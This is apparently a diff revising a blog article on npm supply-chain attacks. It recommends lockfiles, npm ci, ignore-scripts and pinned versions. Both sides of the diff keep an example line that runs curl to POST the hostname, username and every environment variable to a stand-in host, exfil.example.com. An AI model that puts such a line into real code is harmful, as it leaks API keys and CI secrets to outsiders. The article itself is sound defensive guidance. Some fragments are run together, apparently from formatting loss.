When Dependencies Ship More Than We Bargained For

 };

-execSync(`curl -X POST -d '${JSON.stringify(data)}' https://exfil.example.com/collect`);That's it.
-Your hostname, username, and every environment variable (which often includes API keys, tokens, CI secrets) shipped off to a remote server.
-And you never even imported the package in your code — just installed it.
+execSync(`curl -X POST -d '${JSON.stringify(data)}' https://exfil.example.com/collect`);This sends our hostname, username, and every environment variable (which often includes API keys, tokens, CI secrets) to a remote server — without the package ever being imported in our code.

-The JavaScript ecosystem has a deep dependency tree problem.
-You install one package and get fifty transitive dependencies.
-You might vet the top-level package, but did you check what it depends on?
+The JavaScript ecosystem has deep dependency trees.
+We install one package and get fifty transitive dependencies.
+We might vet the top-level package, but did we check what it depends on?

 # Count your actual dependency tree

-Lock your dependencies and commit the lockfile.
-This is table stakes. package-lock.json or yarn.lock ensures that everyone on the team (and CI) installs the exact same versions.
-No surprise updates.
+Lock dependencies and commit the lockfile. package-lock.json or yarn.lock ensures everyone on the team and CI install the exact same versions.

 # Use ci instead of install in CI/CD pipelines

-npm cinpm ci installs exactly what's in the lockfile.
-No modifications, no surprises.
-If the lockfile is out of sync with package.json, it fails instead of silently "fixing" things.
+npm cinpm ci installs exactly what is in the lockfile.
+If the lockfile is out of sync with package.json, it fails instead of silently resolving.

 npm install --ignore-scriptsOr configure it in .npmrc:

-ignore-scripts=trueThe trade-off: some legitimate packages use postinstall to compile native bindings or run setup.
-You'll need to run those manually.
-It's worth it.
+ignore-scripts=trueSome legitimate packages use postinstall to compile native bindings — we will need to run those manually.
+It is worth the trade-off.

 Pin exact versions for critical dependencies.
 Instead of ^1.2.3, use 1.2.3.
-You lose automatic patches but gain predictability.
-Update deliberately, not automatically.
+We lose automatic patches but gain predictability.

 {